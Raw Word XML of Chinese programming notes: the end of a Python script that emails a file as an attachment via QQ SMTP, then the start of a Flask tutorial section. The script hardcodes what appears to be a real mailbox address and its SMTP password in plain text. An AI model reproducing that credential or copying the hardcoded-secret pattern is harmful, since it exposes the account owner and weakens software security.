        <w:t xml:space="preserve">    args = parser.parse_args()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C160F08" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    ## </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解析接收方的邮箱</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754BA98D" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    toaddrs = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B48BF8" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if ',' in args.send:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136A8BC7" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        for single_email in args.send.split(','):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79810D4F" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            toaddrs.append(single_email)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E87C7E" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFCE415" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        toaddrs.append(args.send)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C6F291" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22545EBF" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置邮件配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C39676" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    ## </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发送方</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6FF4DF" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    fromaddr = '2409879947@qq.com'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0511FE36" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    password = 'eamsmmphtspmebjb'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E520003" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发信内容</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD734E0" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    ## </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>附件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1461A6" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    # stdin = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F2E2D6" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    # with fileinput.input(openhook=fileinput.hook_encoded(encoding='gbk')) as f_input:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF51B28" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    #     for line in f_input:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1FD18D" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    #         stdin += line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B71086" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    with open(args.stdin) as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3401B9B9" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        stdin = f.read()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413ECE44" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        f.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217BDB4D" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    resApart = MIMEApplication(stdin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2798CF39" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    resApart.add_header('Content-Disposition', 'attachment', filename="report.txt")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5284AA" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    ## </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正文</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B8481E" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    # content = args.content+"\n"+stdin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB3A959" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    content = args.content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73749E4F" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    textApart = MIMEText(content, 'plain', 'utf-8')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEA3AE1" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    m = MIMEMultipart()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E19F15" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    m.attach(textApart)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A0BE32" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    m.attach(resApart)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAD6EA3" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    ## </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7A4153" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    m['Subject'] = args.subject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6328EC62" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    ## </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自定义发件人</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340166B6" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    # m['From'] = _format_addr(fromaddr)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CE184E" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    m['From'] = "syj@192.168.3.199 "+fromaddr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6187270D" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    ## </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自定义收件人</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不定义会显示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收件人未填写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F1F8D7" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    for item in toaddrs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E3FECA" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        m['to'] = _format_addr(item)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B24513" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6010E4DC" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>邮件行为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0328A88A" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D656BA" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        server = smtplib.SMTP_SSL('smtp.qq.com', 465)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC9F7F0" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        server.login(fromaddr, password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65397EEA" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        server.sendmail(fromaddr, toaddrs, m.as_string())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C6B0D8" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        print('success')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067B4682" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        server.quit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424C9C41" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    except smtplib.SMTPException as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101337D7" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        print('error:', e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C51FEDC" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00AB09E7" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA79D70" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    global args</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAB7B09" w14:textId="054FA636" w:rsidR="00822A09" w:rsidRPr="00822A09" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    send_mail()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFC835A" w14:textId="77777777" w:rsidR="00822A09" w:rsidRDefault="00822A09" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53A9AFAC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FC5424F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="573" w:name="_Toc159780006"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flask</w:t>
      </w:r>
      <w:bookmarkEnd w:id="573"/>
    </w:p>
    <w:p w14:paraId="3D8DAEF6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>官方教程：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://docs.jinkan.org/docs/flask/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7DDA2C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文档：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://docs.jinkan.org/docs/flask/api.html#api</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A27BCC7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0181DC43" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>简单教程：</w:t>
      </w:r>
      <w:r>
        <w:t>https://zhuanlan.zhihu.com/p/75941916</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEBB221" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="061D9A3F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>依赖两个外部库：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Werkzeug</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Jinja2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B32473" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- flask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Werkzeug</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>路由系统（就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WSGI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WEB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用和多种服务器之间的标准</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接口）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8A2725" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模板引擎使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Jinja2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0C8857" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>itsdangerous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D7398A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08C72500" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="574" w:name="_Toc159780007"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>希望获取更新版本</w:t>
      </w:r>
      <w:bookmarkEnd w:id="574"/>
    </w:p>
    <w:p w14:paraId="5AE31783" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果你需要最新版本的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Flask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，有两种方法：你可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> pip </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拉取开发版本，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或让它操作一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> git checkout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。无论哪种方式，依然推荐使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> virtualenv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5509E45D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="778AB393" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在一个全新的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> virtualenv </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> git checkout </w:t>
